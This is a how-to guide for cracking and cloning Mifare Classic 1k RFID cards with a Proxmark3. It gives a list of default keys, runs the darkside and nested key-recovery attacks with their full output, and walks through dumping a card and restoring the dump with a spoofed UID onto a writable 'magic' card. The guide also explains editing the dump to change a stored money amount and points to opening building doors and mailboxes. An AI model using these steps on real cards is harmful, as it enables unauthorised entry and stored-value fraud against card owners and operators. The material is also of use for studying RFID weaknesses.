How to hack Mifare Classic 1k – all information that you need to copy and tamper with Mifare 1k

0. References:

• https://timdows.com/projects/using-a-mobile-phone-to-clone-a-mifare-card/
• https://hackerwarehouse.com/site-news/mifare-classic-partial-and-full-cloning/
• https://blog.kchung.co/rfid-hacking-with-the-proxmark-3/
• https://firefart.at/post/how-to-crack-mifare-classic-cards/
• https://www.blackhat.com/docs/sp-14/materials/arsenal/sp-14-Almeida-Hacking-MIFARE-Classic-Cards-Slides.pdf

1. Mifare Classic 1k

• High Frequency card
• Use proxmark3> hf search to get basic details i.e: UID, SAK, ATQA
• Use proxmark3> hf mf to get more options
• The Mifare Classic uses CRYPTO1 cryptograpy (see Black Hat presentation about it)
• Mifare classic has 16 sectors, each sector has 4 blocks, each block has 16 bytes -> 1024 bytes
• In order to read a sector or a block we have to specify the Key type (A or B) and the key Value (12 digits hex 0x000000000000 – 0xFFFFFFFFFFFF)
• Sector 0 contains the UID – which is usually read-only
• Most of the time, the default key value is not changes. Common default values:

ffffffffffff
a0b0c0d0e0f0
a1b1c1d1e1f1
a0a1a2a3a4a5
b0b1b2b3b4b5
4d3a99c351dd
1a982c7e459a
000000000000
d3f7d3f7d3f7
aabbccddeeff

In order to copy the card, we need to read all sectors -> dump it to a binary file -> load it to a magic card (a.k.a. Chinese Magic Card) which allows us to write to any of the sectors/blocks

Last block of the sector (the trailer) has the following format:

• first 8 bytes are the A key value
• next are the access bits
• last 8 bytes are the B key value

The other 3 blocks are filled with data

There are 4-byte and 7-byte UID cards

1.1 Mifare memory layout

1.2 4-byte vs. 7-byte

1.3 Sector 0 block 0 layout

2. Get basic information

This should return the type of High Frequency card, as well as UID and some other info:

proxmark3> hf search

3. Read sector data

In order to read a block or sector we need to specify the number, key type and key value. Usually the value is default (see default key values). Try both A and B if not sure.

proxmark3> hf mf rdsc 14 A FFFFFFFFFFFF 
--sector no:14 key type:A key:ff ff ff ff ff ff

isOk:01 
data : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
data : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
data : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
trailer: 00 00 00 00 00 00 ff 07 80 69 ff ff ff ff ff ff

4. Read other keys

Some sectors/blocks may have a custom key. In order to find it, you can try using hf mf mifare

proxmark3> hf mf mifare

Executing command. Expected execution time: 25sec on average 🙂

Press button on the proxmark3 device to abort both proxmark3 and client.
........

uid(4009d071) nt(867dbb16) par(8ce48c44047c047c) ks(0303030f01090d00) nr(00000000)

|diff|{nr} |ks3|ks3^5|parity | 
+----+--------+---+-----+---------------+ 
| 00 |00000000| 3 | 6 |0,0,1,1,0,0,0,1| 
| 20 |00000020| 3 | 6 |0,0,1,0,0,1,1,1| 
| 40 |00000040| 3 | 6 |0,0,1,1,0,0,0,1| 
| 60 |00000060| f | a |0,0,1,0,0,0,1,0| 
| 80 |00000080| 1 | 4 |0,0,1,0,0,0,0,0| 
| a0 |000000a0| 9 | c |0,0,1,1,1,1,1,0| 
| c0 |000000c0| d | 8 |0,0,1,0,0,0,0,0| 
| e0 |000000e0| 0 | 5 |0,0,1,1,1,1,1,0| 

key_count:0 Key not found (lfsr_common_prefix list is null). 
Nt=867dbb16 Failing is expected to happen in 25% of all cases. 
Trying again with a different reader nonce... .#db# 
Mifare: Can't select card ......

uid(4009d071) nt(867dbb16) par(c4dc4c443c74442c) ks(05080f07000c0000) nr(00000001)

|diff|{nr} |ks3|ks3^5|parity | 
+----+--------+---+-----+---------------+ 
| 00 |00000001| 5 | 0 |0,0,1,0,0,0,1,1| 
| 20 |00000021| 8 | d |0,0,1,1,1,0,1,1| 
| 40 |00000041| f | a |0,0,1,1,0,0,1,0| 
| 60 |00000061| 7 | 2 |0,0,1,0,0,0,1,0| 
| 80 |00000081| 0 | 5 |0,0,1,1,1,1,0,0| 
| a0 |000000a1| c | 9 |0,0,1,0,1,1,1,0| 
| c0 |000000c1| 0 | 5 |0,0,1,0,0,0,1,0| 
| e0 |000000e1| 0 | 5 |0,0,1,1,0,1,0,0|

key_count:1
Found valid key:12feed78beef

5. Nested keys

The nested key attack can also be used to retrieve other keys:

proxmark3> hf mf nested 1 0 a 12feed78beef t 
Testing known keys. Sector count=16

nested...

uid:4009d071 trgbl=0 trgkey=1 
Found valid key:45face32feed 
Time in nested: 5.563 (5.563 sec per key)

6. Sector 0

Sector 0 is usually read-only and may contain data that the manufacturer doesn’t want us to change. Dumping the whole card, and re-writing the wanted values to a Magic card (Chinnese card) allows us to tamper with the data.

6.1 Read sector 0, Key type A, key value “12feed78beef

proxmark3> hf mf rdsc 0 A 12feed78beef 
--sector no:0 key type:A key:12 fe ed 78 be ef

db# READ SECTOR FINISHED

isOk:01 
data : 40 09 d0 71 e8 88 04 00 46 8f 75 17 5d 60 28 11 
data : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
data : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
trailer: 00 00 00 00 00 00 ff 07 80 69 45 fa ce 32 fe ed

6.2 Sector 0, block 0

First 8 bytes contain data used to specify the UID, SAK, ATQA. The following 8 bytes are specific to the card:

46 8f 75 17 5d 60 28 11

7. Cloning a card

In order to clone a card, we must first read all sectors. We do this by finding the keys. After we are able to read all sectors, we can use the dump command the dump the data to a binary file. Afterward, we place the Magic Card on the proxmark, and restore the dumped binary on it. Setting the UID may be needed (?) as well

7.1 Dump the original card to .bin and restore on the magic card

proxmark3> hf mf mifare 
proxmark3> hf mf nested 1 0 A 12feed78beef
proxmark3> hf mf dump 
proxmark3> hf mf restore
proxmark3> hf mf setuid 4009d071

7.2 Hexdump of dump.bin

xxd dumpdata.bin 
00000000: 4009 d071 e888 0400 468f 7517 5d60 2811 @..q....F.u.]`(. 
00000010: 0000 0000 0000 0000 0000 0000 0000 0000 ................ 
00000020: 0000 0000 0000 0000 0000 0000 0000 0000 ................ 
00000030: 12fe ed78 beef ff07 8069 45fa ce32 feed ...x.....iE..2..

This will give place the same data on the Chinnese card as on the original card. If we want to tamper with the data (i.e: change money amount specified on the card, we edit the dumpdata.bin file before restoring it). Some card may have checksums – so it’s import to see how the bytes change by using the card a few times, dumping the data after each use, and compare the bytes values.

8. Cracking process

8.1 Autopwn

[usb] pm3 --> script run mifare_autopwn -d

9. Demo

Opening building door and post office box using a cloned mifare classic card: